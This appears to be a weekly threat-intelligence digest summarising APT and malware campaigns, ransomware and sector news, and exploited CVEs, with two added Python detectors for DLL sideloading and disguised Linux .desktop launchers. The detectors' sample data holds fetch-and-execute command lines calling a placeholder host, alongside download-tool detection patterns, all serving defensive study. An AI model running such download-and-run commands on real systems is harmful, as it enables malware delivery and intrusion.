Patchwork APT targets Chinese entities with Nexe backdoor
Cyble researchers identified an ongoing campaign by the Patchwork advanced persistent threat (APT) actor, likely aimed at Chinese entities, that delivers a new backdoor dubbed Nexe. The initial infection vector is a malicious LNK file, likely delivered via phishing emails. The LNK file executes a PowerShell script that downloads two files: a PDF lure and a malicious DLL. The DLL is executed through DLL sideloading and decrypts and runs shellcode that patches the AmsiScanBuffer and EtwEventWrite APIs before delivering Nexe. Patching these two functions blinds AMSI script scanning and ETW event reporting, so the malware can operate with a lower chance of detection. Nexe collects system information such as the process ID, public and private IP addresses, and usernames.
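The chain above (explorer.exe launching PowerShell that downloads files, followed by a DLL loaded from a user-writable directory) is visible in endpoint process-creation and image-load telemetry. The following is an added example of that correlation, not Cyble's code; it runs over constructed Sysmon-style events, and the field names (host, ts, event, image, parent_image, cmdline, loaded, signed), the placeholder URLs and the 10-minute window are assumptions.

```python
"""Correlate the LNK -> PowerShell download -> DLL sideload chain over
Sysmon-style events. Added example with constructed telemetry; the field
names and sample values below are assumptions, not Cyble's data."""
import re
from collections import defaultdict

# Stage 1: PowerShell spawned by explorer.exe (what a double-clicked LNK does)
# whose command line fetches something from the network.
DOWNLOAD_CMDLETS = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadfile|downloadstring|"
    r"start-bitstransfer|net\.webclient", re.I)
EVASION_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy)?p?\s+bypass|-enc", re.I)

# Stage 2: an unsigned DLL loaded from a user-writable directory, which is
# where a DLL dropped next to a legitimate host EXE for sideloading lives.
USER_WRITABLE = re.compile(r"^[a-z]:\\(users|programdata|windows\\temp)\\", re.I)
WINDOW_SECONDS = 600  # correlation window; tuning assumption


def is_ps_download(ev):
    if ev.get("event") != "process_create":
        return False
    image = ev.get("image", "").lower()
    parent = ev.get("parent_image", "").lower()
    return (image.endswith(("powershell.exe", "pwsh.exe"))
            and parent.endswith("explorer.exe")
            and bool(DOWNLOAD_CMDLETS.search(ev.get("cmdline", ""))))


def is_suspicious_dll_load(ev):
    if ev.get("event") != "image_load":
        return False
    loaded = ev.get("loaded", "")
    return (loaded.lower().endswith(".dll")
            and bool(USER_WRITABLE.match(loaded))
            and not ev.get("signed", False))


def detect_sideload_chain(events):
    """Return one alert per suspicious DLL load that follows a PowerShell
    download on the same host within WINDOW_SECONDS."""
    ordered = sorted(events, key=lambda e: e["ts"])
    stage1 = defaultdict(list)
    for ev in ordered:
        if is_ps_download(ev):
            stage1[ev["host"]].append(ev)
    alerts = []
    for ev in ordered:
        if not is_suspicious_dll_load(ev):
            continue
        for s1 in stage1[ev["host"]]:
            if 0 <= ev["ts"] - s1["ts"] <= WINDOW_SECONDS:
                alerts.append({
                    "host": ev["host"],
                    "powershell_cmdline": s1["cmdline"],
                    "evasion_flags": bool(EVASION_FLAGS.search(s1["cmdline"])),
                    "loader": ev["image"],
                    "dll": ev["loaded"],
                    "seconds_after_download": ev["ts"] - s1["ts"],
                })
                break
    return alerts


# Constructed sample telemetry: one malicious chain on ws01, benign noise on ws02.
EVENTS = [
    {"host": "ws01", "ts": 100, "event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell -w hidden -ep bypass -c "iwr http://example.invalid/doc.pdf '
                r'-OutFile $env:TEMP\doc.pdf; iwr http://example.invalid/v.dll '
                r'-OutFile $env:APPDATA\upd\version.dll"'},
    {"host": "ws01", "ts": 130, "event": "image_load",
     "image": r"C:\Users\bob\AppData\Roaming\upd\host.exe",
     "loaded": r"C:\Users\bob\AppData\Roaming\upd\version.dll", "signed": False},
    {"host": "ws02", "ts": 200, "event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell Get-Date"},
    {"host": "ws02", "ts": 210, "event": "image_load",
     "image": r"C:\Program Files\Acme\acme.exe",
     "loaded": r"C:\Windows\System32\version.dll", "signed": True},
]

if __name__ == "__main__":
    for alert in detect_sideload_chain(EVENTS):
        print(alert)
```

The second stage deliberately keys on where the DLL was loaded from rather than on its name, because a sideloaded DLL is usually named after a legitimate library; the signature check and the user-writable path are what separate it from the real one in System32. In production the window and path list need tuning per environment.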
Bulbature and GobRAT used to turn compromised edge devices into ORBs
Since mid-2023, Sekoia researchers have been tracking an infrastructure of edge devices compromised by the GobRAT and Bulbature malware. The attackers run Bash scripts that download the malware from staging servers, ultimately turning the targeted devices into Operational Relay Boxes (ORBs) from which further attacks are launched. The infrastructure consists of over 75,000 compromised hosts across 139 countries, with the United States, Hong Kong, and Sweden the most affected. GobRAT is a remote access trojan (RAT) written in Go that supports 22 command types, including reverse shell operations, distributed denial-of-service attacks, and reading and writing files. Bulbature is an implant that turns a compromised edge device into an ORB and relays attacks against the final target networks; its behaviour is considered more complex than GobRAT's. The infrastructure is believed to be used by several China-based threat actors.
Sparkling Pisces uses KLogEXE and FPSpy to target South Korea and Japan
Palo Alto Networks Unit 42 researchers discovered two previously undocumented malware families, dubbed KLogEXE and FPSpy, used by the North Korean threat actor Sparkling Pisces. KLogEXE is a keylogger written in C++ that collects information on currently running applications, logs keystrokes, and monitors mouse clicks. FPSpy is a backdoor capable of keylogging, storing configuration and system information, and downloading and executing additional encrypted modules, among other functions. Based on code and behavioural similarities, FPSpy appears to be a variant of malware used in a campaign detailed by ASEC researchers in 2022, and it also shares characteristics with the KGHSpy backdoor discovered in 2020. Code similarity was also observed between KLogEXE and FPSpy. Most observed targets were in South Korea and Japan.
Transparent Tribe targets India in campaign using Mythic Poseidon binaries
CYFIRMA researchers observed an ongoing campaign, attributed to Transparent Tribe, that is currently targeting India. The researchers identified 15 servers hosting Mythic C2 infrastructure associated with ongoing attacks that use customised payloads such as Mythic Poseidon binaries. For initial access, Transparent Tribe distributes malicious Linux desktop entry (.desktop) files disguised as PDFs; when a victim opens one, the entry's Exec command runs malicious binaries that establish persistent access and help evade detection. Transparent Tribe is believed to be increasingly targeting Linux environments because of their widespread use in Indian government sectors; in particular, the Debian-based BOSS OS is used across various ministries and defence forces.
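A .desktop file is a plain INI-style text file, so a disguised launcher can be triaged by parsing it and comparing what it claims to be (Name, Icon, the filename) with what it runs (Exec). The following is an added example of that triage, not CYFIRMA's tooling; the two sample entries are constructed, and the URL, paths and the lists of interpreters and staging paths are assumptions to be tuned for a real environment.

```python
"""Heuristic triage of Linux .desktop files that pose as documents.

Added example, not CYFIRMA's code. The sample entries are constructed;
the URL and paths in them are placeholders."""
import configparser
import os
import re
import shlex

# Programs a document icon should never launch directly (assumed list).
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}
DOWNLOADERS = re.compile(r"\b(curl|wget)\b")
STAGING_PATHS = re.compile(r"(/tmp/|/dev/shm/|/var/tmp/|\$HOME/\.|~/\.)")
DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.I)
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.desktop$", re.I)

# Constructed samples: a disguised launcher and a legitimate viewer entry.
SAMPLES = {
    "Report.pdf.desktop": """[Desktop Entry]
Type=Application
Name=Report.pdf
Icon=application-pdf
Exec=bash -c "curl -s http://example.invalid/p -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x"
Terminal=false
""",
    "evince.desktop": """[Desktop Entry]
Type=Application
Name=Document Viewer
Icon=org.gnome.Evince
Exec=evince %U
Terminal=false
""",
}


def parse_desktop_entry(text):
    """Return the [Desktop Entry] group as a dict, or None if it is missing."""
    # interpolation=None keeps '%U'-style field codes from being mangled;
    # optionxform=str keeps key case, which the .desktop spec treats as significant.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return None
    return dict(cp.items("Desktop Entry"))


def analyze_desktop(text, filename=""):
    """Return a list of reasons the entry looks like a disguised launcher
    (empty list means nothing suspicious was found)."""
    entry = parse_desktop_entry(text)
    if entry is None:
        return ["no [Desktop Entry] group"]
    reasons = []
    name = entry.get("Name", "")
    icon = entry.get("Icon", "")
    exec_line = entry.get("Exec", "")
    looks_like_doc = bool(DOC_EXT.search(name)) or "pdf" in icon.lower()
    try:
        argv = shlex.split(exec_line)
    except ValueError:  # unbalanced quotes; fall back to a naive split
        argv = exec_line.split()
    prog = os.path.basename(argv[0]) if argv else ""

    if filename and DOUBLE_EXT.search(filename):
        reasons.append(f"double extension in filename {filename!r}")
    if looks_like_doc and prog in INTERPRETERS:
        reasons.append(f"document-looking entry {name!r} launches interpreter {prog!r}")
    if DOWNLOADERS.search(exec_line):
        reasons.append("Exec fetches content from the network at launch")
    if STAGING_PATHS.search(exec_line):
        reasons.append("Exec references a temp or hidden staging path")
    return reasons


if __name__ == "__main__":
    for fname, text in SAMPLES.items():
        print(fname, analyze_desktop(text, fname) or "clean")
```

The same function can be pointed at ~/.local/share/applications and ~/Desktop on a suspect host; a legitimate document launcher resolves to a viewer binary, not to a shell with a download command.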
Fake Android and iOS mobile trading apps distributed in pig butchering scheme
Since May 2024, Group-IB researchers have identified multiple fake Android and iOS apps, collectively classified under the UniShadowTrade malware family, that pose as trading or cryptocurrency platforms and are used in pig butchering schemes. Victims are typically lured through dating apps or social networks, with the attackers using social engineering to gain their trust. The apps were developed with the uni-app cross-platform framework and were initially distributed via Google Play and the Apple App Store; after their removal from the official stores, the attackers switched to distributing them through phishing websites. Once installed, users are instructed to trust the enterprise developer profile (required for an iOS app installed outside the App Store), register with the app, and follow a set of investment instructions that result in the theft of their funds. The fake apps support English, Portuguese, Chinese, and Hindi, and have targeted victims in the Asia-Pacific region, Europe, the Middle East, and Africa.
Ransomware
[Chart: volume of blog posts by ransomware operators during the last week]
Security Brief: Royal Mail Lures Deliver Open Source Prince Ransomware (Proofpoint US Blog – Oct 02 2024)
Is MEOW Ransomware Getting Its Claws Out? (Cyberint – Oct 02 2024)
Key Group: another ransomware group using leaked builders (ITSecurityNews.info – Oct 01 2024)
LockBit power cut: four new arrests and financial sanctions against affiliates (Europol – Publications & Documents – Oct 01 2024)
JPCERT shares Windows Event Log tips to detect ransomware attacks (Bleeping Computer – Sep 30 2024)
Storm-0501: Ransomware attacks expanding to hybrid cloud environments (Microsoft Security Blog – Sep 26 2024)
Financial Services
Data Leak Strikes Latin America's Financial Institutions: Fintech App at the Center (Medium Cybersecurity – Oct 03 2024)
Cyberattack on Russian financial sector: Banks and telecom hit (RBC Ukraine – Oct 02 2024)
Crypto-Stealing Code Lurking in Python Package Dependencies (Checkmarx – Oct 01 2024)
The Cryptocurrency Drainer Hiding on Google Play (Check Point Blog – Sep 26 2024)
Treasury Takes Coordinated Actions Against Illicit Russian Virtual Currency Exchanges and Cybercrime Facilitator (US Department of the Treasury – Featured Stories – Sep 26 2024)
Geopolitics
China-Backed APT Group Culling Thai Government Data (Dark Reading – Oct 03 2024)
Threat Actor Claims Breach of Indonesian Government Database (Daily Dark Web – Oct 02 2024)
Threat Actor Claims to Have Breached High-Profile Israeli Institutions (Daily Dark Web – Sep 30 2024)
UK and US issue alert over cyber actors working on behalf of Iranian state (National Cyber Security Centre – Sep 27 2024)
SilentSelfie: Uncovering a major watering hole campaign against Kurdish websites (Sekoia Blog – Sep 25 2024)
High Priority Vulnerabilities
Name | Software | Base Score | Temporal Score | Related
---|---|---|---|---
CVE-2024-29824 | Ivanti Endpoint Manager | 7.3 | 7.0 | Critical Ivanti RCE flaw with public exploit now used in attacks
CVE-2023-25280 | D-Link DIR820LA1 | 9.8 | 5.3 | SAP, D-Link flaws among 4 added to Known Exploited Vulnerabilities catalog
CVE-2024-34102 | Magento (Adobe Commerce) | 9.8 | 9.4 | CosmicSting flaw exploited to hack 5% of all Adobe Commerce and Magento stores
CVE-2017-10271 | Oracle WebLogic Server | 9.8 | 9.4 | Hadooken and K4Spreader: The 8220 Gang's Latest Arsenal
CVE-2024-27956 | WordPress Automatic Plugin | 9.9 | 7.1 | Cyble Honeypot Sensors Detect WordPress Plugin Attack, New Banking Trojan